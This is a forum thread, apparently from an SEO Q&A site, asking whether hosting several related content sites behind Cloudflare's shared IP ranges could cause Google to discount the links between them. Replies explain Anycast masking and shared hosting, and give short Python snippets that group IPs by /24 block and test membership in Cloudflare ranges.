How might Cloudflare affect "rank juice" across numerous domains due to its limited IP range?
-
We have moved quite a few large websites onto Cloudflare and have been very happy with our results. Since this has been successful so far, we have been considering putting some other companies on CL as well, but we have some concerns due to the structure of their business and related websites.
The companies run multiple networks of technology, review, news, and informational websites. All currently have good content (almost all unique to each website) and good rankings, but if moved to Cloudflare, they would be sharing DNS and most likely IPs with each other. This raises the concern that Google might reduce their link juice because the links would be detected as coming from the same server, the way people used to run their blog farms.
For example, the writers might be tasked with an article on XYZ company's new product. A unique article would be generated for 5-10 websites, each with unique, informative, valid, and relevant content for its domain, including links (direct or contextual) to the XYZ product or website URL. To clarify, so there is no confusion, each article is relevant to its website:
technology website - article about the engineering of the XYZ product
business website - how the XYZ product is affecting the market or stock price
howto website - how the XYZ product is properly used
Currently all sites are on different IPs and servers due to their size, but if routed through Cloudflare, will Google simply detect this as duplicate linking efforts or some type of "black hat" effort since it's all coming from Cloudflare?
If yes, is there a way to prevent this while still using CL?
If no, why, and how is this different from someone doing this to trick Google?
Thank you in advance! I look forward to some informative answers.
-
Thank you for some great information! I am reading it over now!
The concern is not necessarily the PageRank or DA of the sites hosting the content and linking out, but that Google might reduce or diminish the link juice of the actual links, since they would likely be detected as originating from the same server.
It might be 5-10 websites with original content...but it's not really something we can "test and see".
Thank you again!
-
For a small number of sites I would not be concerned, but if you are worried, try Microsoft Azure: you get a unique IP for each website, and they are very cheap with a great interface.
-
Response updated
-
Where did you get the information that all sites stay on different IPs? I ask because three of the sites we are running for clients are all coming from the same IP, or at least the same C block/range.
A better question might be whether there is a way to ensure they are served from different IPs, since we cannot risk it.
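If you want to audit this yourself, here is a minimal sketch in Python that groups a set of already-resolved domains by their /24 network, i.e. the same "C block". The domain names and IPs below are hypothetical placeholders; in practice you would resolve each of your own domains first (e.g. with `dig +short yourdomain.com`) and plug the results in:

```python
import ipaddress
from collections import defaultdict

def shared_c_blocks(domain_ips):
    """Group domains by their /24 network ('C block') and return
    only the blocks that more than one domain resolves into."""
    groups = defaultdict(list)
    for domain, ip in domain_ips.items():
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        groups[str(net)].append(domain)
    return {net: doms for net, doms in groups.items() if len(doms) > 1}

# Hypothetical resolved IPs standing in for real DNS lookups.
resolved = {
    "tech-site.example":  "104.16.5.10",
    "biz-site.example":   "104.16.5.200",
    "howto-site.example": "203.0.113.7",
}
print(shared_c_blocks(resolved))
# -> {'104.16.5.0/24': ['tech-site.example', 'biz-site.example']}
```

Run it against your live sites before and after enabling the proxy and you can see exactly which domains Google would observe sharing a range.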
Side note, I am waiting for a response from CL as well and will post their info if relevant.
thanks!
-
UPDATED/CLARIFICATION: Responding to your comment "Currently all sites are on different IP's and servers due to their size."
Your origin server IP addresses (A records) stay the same and unique. They are masked by Cloudflare's Anycast network, which uses different IP addresses across the world; depending on where a visitor connects from, the addresses they see can be identical or in a similar range. Cloudflare caches static content with a short expiry time; for non-cached content, its servers proxy requests through to the origin server and then forward the response to the user.
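You can see the masking in practice: a proxied domain resolves to a Cloudflare edge address rather than to your origin A record. The sketch below checks whether a resolved IP falls inside Cloudflare's address space; the range list is only a small subset of Cloudflare's published IPv4 ranges, so fetch the authoritative, current list from cloudflare.com/ips before relying on it:

```python
import ipaddress

# Subset of Cloudflare's published IPv4 ranges
# (see cloudflare.com/ips for the full, current list).
CLOUDFLARE_V4 = [
    "104.16.0.0/13",
    "172.64.0.0/13",
    "173.245.48.0/20",
    "141.101.64.0/18",
]

def is_cloudflare_ip(ip):
    """True if `ip` falls inside one of the listed Cloudflare ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in CLOUDFLARE_V4)

print(is_cloudflare_ip("104.17.2.3"))    # inside 104.16.0.0/13
print(is_cloudflare_ip("198.51.100.9"))  # documentation address, not Cloudflare
```

If your sites resolve to addresses that pass this check, visitors (and crawlers) are seeing Cloudflare's edge, not your origin servers.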
See http://www.quora.com/CloudFlare/How-does-CloudFlare-work for a detailed response from CloudFlare's CEO to a similar question.
Now Google "should", first of all, understand how Cloudflare works as a CDN, just as it does with other similar CDNs and security platforms.
Does Google care about shared IPs? No, unless there are spammy neighbors on them:
“… there was recently a discussion on a NANOG (North American Network Operators Group) email list about virtual hosting vs. dedicated IP addresses. They were commenting on the misconception that having multiple sites hosted on the same IP address will in some way affect the PageRanks of those sites. There is no PageRank difference whatsoever between these two cases (virtual hosting vs. a dedicated IP).” - Matt Cutts' blog
Should Google be able to figure this out and differentiate Cloudflare's masking? Yes. But has Google been known to incorrectly diagnose spam? Also yes, and with issues probably less complex than Cloudflare. The question may be whether you want to take that risk, or a partial risk, since you can actually use your own DNS with Cloudflare (paid version), again hoping and assuming Google will understand.
Hope this helps. I'm curious how Cloudflare will respond to this, so please update. But as an SEO'r, it would depend on how much risk you want to take in this case.